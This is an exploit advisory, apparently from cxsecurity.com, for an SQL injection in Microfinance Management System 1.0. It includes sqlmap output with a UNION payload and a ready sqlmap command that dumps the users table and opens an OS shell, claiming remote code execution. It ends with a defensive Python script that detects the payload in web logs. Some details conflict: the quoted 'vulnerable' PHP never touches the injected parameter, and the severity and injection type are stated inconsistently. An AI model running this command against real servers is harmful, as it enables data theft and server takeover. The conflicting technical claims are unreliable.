Microfinance Management System 1.0 SQL Injection

Credit: Hejap Zairy
Risk: Medium
Local: No
Remote: Yes

# Title: Microfinance Management System 1.0 SQLi To Rce
# Author: Hejap Zairy
# Date: 24.07.2022
# Vendor: https://www.sourcecodester.com/php/14822/microfinance-management-system.html
# Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/mims_0.zip
# Reference: https://github.com/Matrix07ksa
# Tested on: Windows, MySQL, Apache

#vulnerability Code php

```php
<?php
$sql = "SELECT count(*) AS total_account FROM account_type";
$result = mysqli_query($conn, $sql);
$data = mysqli_fetch_assoc($result);
?>
}
```

#Status: CRITICAL

```
GET parameter 'account_type_number' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 147 HTTP(s) requests:
---
Parameter: account_type_number (GET)
    Type: UNION query
    Title: MySQL UNION query (random number) - 3 columns
    Payload: account_type_number=-6015' UNION ALL SELECT 7366,CONCAT(0x716b626b71,0x4268666c6b715274794a58534f487366546e5379414951584a684459764f424451536f5a707a6a6a,0x7170707a71),7366#
---
```

#SQLi Time to Rce

#Exploit

```
sqlmap -u 'http://0day.gov/mims/updateaccount_type.php?account_type_number=6015' --hex --time-sec=17 --dbms=mysql --technique=u --random-agent --eta -p account_type_number -D mims -T users --dump --os-shell
```

# Description:
The Blind Time SQLi vulnerability was converted to rce due to the permissions I have in the database and it was privesc

# Proof and Exploit:
https://i.imgur.com/kRcQmxO.png
https://i.imgur.com/4RmKSom.png
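One way to look for this activity in web-server logs, as an added example that is not part of the original advisory: because the command above uses `--random-agent`, matching on User-Agent is unreliable, so the check keys on the decoded `account_type_number` value instead. It assumes Apache combined log format and that legitimate values are plain decimal integers; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumptions (not taken from the application's source): Apache combined log
# format, and legitimate account_type_number values are decimal integers.
TARGET_PATH = "/mims/updateaccount_type.php"
PARAM = "account_type_number"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) ')
SQL_HINTS = re.compile(
    r"union\s+(all\s+)?select|concat\s*\(|sleep\s*\(|0x[0-9a-f]{4,}", re.I)

def inspect_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["uri"])
    # Windows/Apache serves paths case-insensitively, so compare lowercased.
    if parts.path.lower() != TARGET_PATH:
        return None
    # parse_qs percent-decodes, so %27 becomes ' and %20 becomes a space.
    values = parse_qs(parts.query, keep_blank_values=True).get(PARAM, [])
    bad = [v for v in values if not re.fullmatch(r"[0-9]+", v)]
    if not bad:
        return None
    reason = "sql-syntax" if any(SQL_HINTS.search(v) for v in bad) else "non-numeric"
    return {"ip": m["ip"], "status": int(m["status"]), "value": bad[0], "reason": reason}

def scan(lines):
    """Collect findings for every log line that trips the check."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample log lines (documentation IP ranges), not captured traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Jul/2022:10:01:02 +0000] "GET /mims/updateaccount_type.php?account_type_number=6015 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [24/Jul/2022:10:02:10 +0000] "GET /mims/updateaccount_type.php?account_type_number=-6015%27%20UNION%20ALL%20SELECT%207366%2CCONCAT%280x716b626b71%29%2C7366%23 HTTP/1.1" 200 5301 "-" "Opera/9.80"',
    '203.0.113.9 - - [24/Jul/2022:10:02:11 +0000] "GET /mims/updateaccount_type.php?account_type_number=6015%27 HTTP/1.1" 500 312 "-" "Mozilla/4.0"',
    '198.51.100.7 - - [24/Jul/2022:10:03:00 +0000] "GET /mims/index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integers-only rule, enforced server-side before the value reaches the query, is also the input check that would reject the payload shown in the sqlmap output.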

Copyright 2022, cxsecurity.com

